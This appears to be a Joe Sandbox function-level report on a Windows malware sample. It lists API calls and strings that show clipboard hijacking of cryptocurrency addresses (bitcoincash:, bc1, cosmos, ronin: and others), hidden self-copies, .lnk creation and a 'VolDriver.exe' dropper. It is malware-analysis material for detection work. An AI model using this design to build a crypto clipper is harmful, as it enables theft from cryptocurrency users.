Similarity

API ID: Process$CurrentHeap$CreateHeapsInformation
String ID:
API String ID: 3179415709-0
Opcode ID: 6e4ea9a8f9775c1dfdd052d4a1efd7a2f3bc80083ff0a66d15f28d6d25a97103
Instruction ID: 286741cd662b80523320d166f89557ed49807363007196fac8a26e8fd60d1c43
Opcode Fuzzy Hash: 6e4ea9a8f9775c1dfdd052d4a1efd7a2f3bc80083ff0a66d15f28d6d25a97103
Instruction Fuzzy Hash: 22F090B0544308AFD724DF65BC0ABA63674B744315F44813AF6089A2D1EBB99824CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409FF0 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A090: GetCurrentProcessId.KERNEL32(?,00409FFB,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A093

RtlAllocateHeap.NTDLL(021A0000,?,-0000000C), ref: 0040A03A
memset.NTDLL ref: 0040A074

Part of subcall function 0040A0B0: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A007,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A0DC
Part of subcall function 0040A0B0: HeapSetInformation.KERNEL32(021A0000,00000000,00000002,00000004), ref: 0040A106
Part of subcall function 0040A0B0: GetCurrentProcessId.KERNEL32 ref: 0040A10C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
String ID:
API String ID: 3494217179-0
Opcode ID: 221ff9bf4637e0f2fcde085651825014d24c986efab82c4dd12a184a83869ec7
Instruction ID: df671814152bebb26e69c002585293889e867c83d00cbddb1be5e8999c879425
Opcode Fuzzy Hash: 221ff9bf4637e0f2fcde085651825014d24c986efab82c4dd12a184a83869ec7
Instruction Fuzzy Hash: 49111275D00208FFDB10DFA9D845F9E7BB4AF48308F04C169F608AB381E6399A54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D790 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 0040B440: EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
Part of subcall function 0040B440: LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C

InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D7BD
WaitForSingleObject.KERNEL32(0000061C,00001388), ref: 0040D807

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
String ID:
API String ID: 3920643007-0
Opcode ID: 84fb30d8ac40b996f337d270279570023f86994429b4a296eac51e0e31cf65db
Instruction ID: d43f0fe25c3251aeb4024b5a44130fee1f3604a21426a3a303ccaeae81292ff9
Opcode Fuzzy Hash: 84fb30d8ac40b996f337d270279570023f86994429b4a296eac51e0e31cf65db
Instruction Fuzzy Hash: 4111A175E00208ABE704EBE4DC46FAE7775AB44704F10807AE601772D2E679AE50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B010 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 0040B02C
gethostbyname.WS2_32(?), ref: 0040B03E

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostname
String ID:
API String ID: 3961807697-0
Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
Instruction ID: 9c091e62e96c824db52d3ded4772c24a160659da8493513af369241dcb3163e3
Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
Instruction Fuzzy Hash: 631100349041188BCB24CF14C844BDAB7B1EB65314F14C6DAD49967391C7F96DC5CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC80 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(0040AD01), ref: 0040AC8A
gethostbyname.WS2_32(?), ref: 0040AC9D

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
Instruction ID: 312701b97bf9dc8992d88ef9bdb8c1d55890938f4ab66c2671a86e13cba3ff2a
Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
Instruction Fuzzy Hash: D5F01C38D00208EFCB00DFB4D44889DBBB4EB48311F2083AAE905673A0D7319E80DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040B660 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(0000061C,000003E8), ref: 0040B66E
InterlockedDecrement.KERNEL32(00416068), ref: 0040B680

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: DecrementInterlockedObjectSingleWait
String ID:
API String ID: 4086267124-0
Opcode ID: d9631427891ee6aa9ae7329f02fb181f4c0a1243ccccb7a40fb15ef81033e72f
Instruction ID: 813cb8d251f0332b77a609c490e93f9283edb612d06304cc331b5f99f3a273e6
Opcode Fuzzy Hash: d9631427891ee6aa9ae7329f02fb181f4c0a1243ccccb7a40fb15ef81033e72f
Instruction Fuzzy Hash: B5D0A73164030493C74057A5BC49FAA3A5DEB14711F608833F140F11D0C7BDC89086BF

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD80 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

shutdown.WS2_32(0040AD6D,00000002), ref: 0040AD89
closesocket.WS2_32(0040AD6D), ref: 0040AD93

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID:
API String ID: 572888783-0
Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B440 Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: d71b46d2a715c7ae67ca145340e55f7dee3c0646f3594f4dbcbfd189e29d16fc
Instruction ID: ba03583b253ec91699bd5e361358be9260e1d13ac05daae16e4e5e595cf7ad68
Opcode Fuzzy Hash: d71b46d2a715c7ae67ca145340e55f7dee3c0646f3594f4dbcbfd189e29d16fc
Instruction Fuzzy Hash: 6BE04FB4989604EBC705DF8CEC49B997BB4F705324F204179F809533A1D7B9AE50CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADA0 Relevance: 2.5, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004176A8,?,0040B637), ref: 0040ADA8
LeaveCriticalSection.KERNEL32(004176A8,?,0040B637), ref: 0040ADB8

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a62c6441e8ce307879afa927716fec91506432b2dfe47bc4b8af2369b723e83a
Instruction ID: 716e569b0d3b626b873371b16fee73ea372d9d3996ce4e23563d04fcf61f0ac1
Opcode Fuzzy Hash: a62c6441e8ce307879afa927716fec91506432b2dfe47bc4b8af2369b723e83a
Instruction Fuzzy Hash: 97B092301D971AB7C10637AEAC0AAC83A28A990B26B604032B04D504A5CEEEA4A0496E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0F0 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B440: EnterCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B450
Part of subcall function 0040B440: LeaveCriticalSection.KERNEL32(004176A8,?,?,0040D0F9), ref: 0040B47C

WaitForSingleObject.KERNEL32(0000061C,00001388), ref: 0040D11C

Part of subcall function 0040CD10: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CD1C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
String ID:
API String ID: 3309573332-0
Opcode ID: 262f0a1188c4c0cab9bb7d2480aa1ff1c397132662bf8e40164d60a473f31973
Instruction ID: ce7864885f3d84405b0061ad2a7a6bd3390cc58ec662b4736d5f806c99c86722
Opcode Fuzzy Hash: 262f0a1188c4c0cab9bb7d2480aa1ff1c397132662bf8e40164d60a473f31973
Instruction Fuzzy Hash: 25E09271D00308A6D714A7A19806B9F766A9B54305F24887AFA007A2C2DE7A9E9493AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406260 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062C0: GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD

lstrcpyW.KERNEL32(?,?), ref: 004062B3

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: DriveTypelstrcpy
String ID:
API String ID: 3664088370-0
Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
Opcode Fuzzy Hash: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406650 Relevance: 75.5, APIs: 32, Strings: 11, Instructions: 293fileCOMMON

Download Yara Rule

APIs

_chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
wsprintfW.USER32 ref: 0040668F
wsprintfW.USER32 ref: 004066AF
wsprintfW.USER32 ref: 004066CF
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 00406708
PathFileExistsW.SHLWAPI(?), ref: 00406718
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
DeleteFileW.KERNEL32(?), ref: 0040675E
PathFileExistsW.SHLWAPI(?), ref: 0040676B
PathFileExistsW.SHLWAPI(?), ref: 0040677C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
PathFileExistsW.SHLWAPI(?), ref: 004067AF
CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\135143440.exe,?,00000000), ref: 004067C7
SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA

Strings

shell32.dll, xrefs: 00406813
%s\%s\%s, xrefs: 00406AA8
C:\Users\user\AppData\Local\Temp\135143440.exe, xrefs: 004067C2
%s\%s, xrefs: 00406A81
%s\%s, xrefs: 004066A3
%s\%s, xrefs: 00406A0E
%s.lnk, xrefs: 00406683
%s\%s\VolDriver.exe, xrefs: 004066C3
%s\%s, xrefs: 004066E3
shell32.dll, xrefs: 004067FB
%s\*, xrefs: 004066FC

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$C:\Users\user\AppData\Local\Temp\135143440.exe$shell32.dll$shell32.dll
API String ID: 3833403615-2373606944
Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004048A0 Relevance: 74.5, APIs: 26, Strings: 16, Instructions: 951clipboardstringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 004048BC
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404C72
StrStrW.SHLWAPI(00000000,cosmos), ref: 00404C9D
StrStrW.SHLWAPI(00000000,addr), ref: 00404CC8
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D67
StrStrW.SHLWAPI(00000000,ronin:), ref: 00404D7E
StrStrW.SHLWAPI(00000000,nano_), ref: 00404D95
isalpha.NTDLL ref: 00404E14
isdigit.NTDLL ref: 00404E2B
StrStrW.SHLWAPI(00000000,bnb), ref: 0040530C
StrStrW.SHLWAPI(00000000,band), ref: 00405326
StrStrW.SHLWAPI(00000000,bc1), ref: 00405340
StrStrW.SHLWAPI(00000000,ronin:), ref: 0040535A
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405374
StrStrW.SHLWAPI(00000000,cosmos), ref: 0040538E
StrStrW.SHLWAPI(00000000,addr), ref: 004053A8
StrStrW.SHLWAPI(00000000,nano_), ref: 004053C2
lstrlenA.KERNEL32(00000000), ref: 00405483
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040549E
GlobalLock.KERNEL32(00000000), ref: 004054B1
memcpy.NTDLL(00000000,00000000,-00000001), ref: 004054CF
GlobalUnlock.KERNEL32(00000000), ref: 004054DB
OpenClipboard.USER32(00000000), ref: 004054E3
EmptyClipboard.USER32 ref: 004054ED
SetClipboardData.USER32(00000001,00000000), ref: 004054F9
CloseClipboard.USER32 ref: 004054FF

Strings

bc1, xrefs: 00405337
nano_, xrefs: 004053B9
bnb, xrefs: 00405303
ronin:, xrefs: 00404D75
bitcoincash:, xrefs: 00404C69
cosmos, xrefs: 00404C94
0, xrefs: 0040541B
hA, xrefs: 004053CC
addr, xrefs: 0040539F
cosmos, xrefs: 00405385
bitcoincash:, xrefs: 0040536B
addr, xrefs: 00404CBF
bitcoincash:, xrefs: 00404D5E
ronin:, xrefs: 00405351
nano_, xrefs: 00404D8C
band, xrefs: 0040531D

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
String ID: 0$addr$addr$band$bc1$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
API String ID: 2780752356-1454159098
Opcode ID: 77815f1f35a1cc3ce37f81e42cca13de53b9b454e4023a23e876cae76c16c78e
Instruction ID: 8b76dbab904426f6344c2213623639f5583a586d6f1bda248701b4bb768ff90c
Opcode Fuzzy Hash: 77815f1f35a1cc3ce37f81e42cca13de53b9b454e4023a23e876cae76c16c78e
Instruction Fuzzy Hash: D58238B0A00218EACF548F41C0945BE7BB2EF82751F60C0ABE9456F294D77D9EC1DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407D60 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON

Download Yara Rule

APIs

_aullshr.NTDLL ref: 00407E5D
_allshl.NTDLL ref: 00407E76
_aullshr.NTDLL ref: 00407F44
_allshl.NTDLL ref: 00407F5D
_aullshr.NTDLL ref: 00408026
_allshl.NTDLL ref: 0040803F
_aullshr.NTDLL ref: 00408108
_allshl.NTDLL ref: 00408121
_aullshr.NTDLL ref: 004081EA
_allshl.NTDLL ref: 00408203
_aullshr.NTDLL ref: 004082C6
_allshl.NTDLL ref: 004082DF
_aullshr.NTDLL ref: 004083A2
_allshl.NTDLL ref: 004083BB
_aullshr.NTDLL ref: 0040847E
_allshl.NTDLL ref: 00408497
_aullshr.NTDLL ref: 0040855A
_allshl.NTDLL ref: 00408573
_aullshr.NTDLL ref: 00408636
_allshl.NTDLL ref: 0040864F
_aullshr.NTDLL ref: 00408712
_allshl.NTDLL ref: 0040872B
_aullshr.NTDLL ref: 004087EE
_allshl.NTDLL ref: 00408807
_aullshr.NTDLL ref: 004088CA
_allshl.NTDLL ref: 004088E3
_aullshr.NTDLL ref: 004089A6
_allshl.NTDLL ref: 004089BF
_aullshr.NTDLL ref: 00408A82
_allshl.NTDLL ref: 00408A9B
_aullshr.NTDLL ref: 00408B58
_allshl.NTDLL ref: 00408B71
_allshl.NTDLL ref: 00408B92
_aullshr.NTDLL ref: 00408BA3

Strings

Y, xrefs: 00407D80

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID: Y
API String ID: 673498613-3233089245
Opcode ID: 2b6c3b75d77b0e24acab98f6bd1a69bf3c8c981e8cdcfd24e3371654e0b37102
Instruction ID: 4d8f306ddd96cdbeec7be06e546bd05c29a7a48ff42b254dd7b8871862d7ca9e
Opcode Fuzzy Hash: 2b6c3b75d77b0e24acab98f6bd1a69bf3c8c981e8cdcfd24e3371654e0b37102
Instruction Fuzzy Hash: 26D22C79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00407D89 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON

Download Yara Rule

APIs

_aullshr.NTDLL ref: 00407E5D
_allshl.NTDLL ref: 00407E76
_aullshr.NTDLL ref: 00407F44
_allshl.NTDLL ref: 00407F5D
_aullshr.NTDLL ref: 00408026
_allshl.NTDLL ref: 0040803F
_aullshr.NTDLL ref: 00408108
_allshl.NTDLL ref: 00408121
_aullshr.NTDLL ref: 004081EA
_allshl.NTDLL ref: 00408203
_aullshr.NTDLL ref: 004082C6
_allshl.NTDLL ref: 004082DF
_aullshr.NTDLL ref: 004083A2
_allshl.NTDLL ref: 004083BB
_aullshr.NTDLL ref: 0040847E
_allshl.NTDLL ref: 00408497
_aullshr.NTDLL ref: 0040855A
_allshl.NTDLL ref: 00408573
_aullshr.NTDLL ref: 00408636
_allshl.NTDLL ref: 0040864F
_aullshr.NTDLL ref: 00408712
_allshl.NTDLL ref: 0040872B
_aullshr.NTDLL ref: 004087EE
_allshl.NTDLL ref: 00408807
_aullshr.NTDLL ref: 004088CA
_allshl.NTDLL ref: 004088E3
_aullshr.NTDLL ref: 004089A6
_allshl.NTDLL ref: 004089BF
_aullshr.NTDLL ref: 00408A82
_allshl.NTDLL ref: 00408A9B
_aullshr.NTDLL ref: 00408B58
_allshl.NTDLL ref: 00408B71
_allshl.NTDLL ref: 00408B92
_aullshr.NTDLL ref: 00408BA3

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: d93e173d11edabbe82854e57cccec4cdb31f5773cec3a15aa4c8c5b1acdc36b5
Instruction ID: 79e03549b4f3619f9c0a7ca38024119294f73f3101d0de1f55345608e55bd6d2
Opcode Fuzzy Hash: d93e173d11edabbe82854e57cccec4cdb31f5773cec3a15aa4c8c5b1acdc36b5
Instruction Fuzzy Hash: CBD22B79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00406510 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
wsprintfW.USER32 ref: 00406535
FindFirstFileW.KERNEL32(?,?), ref: 0040654C
lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
wsprintfW.USER32 ref: 004065AA
wsprintfW.USER32 ref: 004065CA
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
FindClose.KERNEL32(000000FF), ref: 0040662F
RemoveDirectoryW.KERNEL32(?), ref: 00406639

Strings

%s\%s, xrefs: 0040659E
%s\%s, xrefs: 004065BE
%s\*, xrefs: 00406529

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
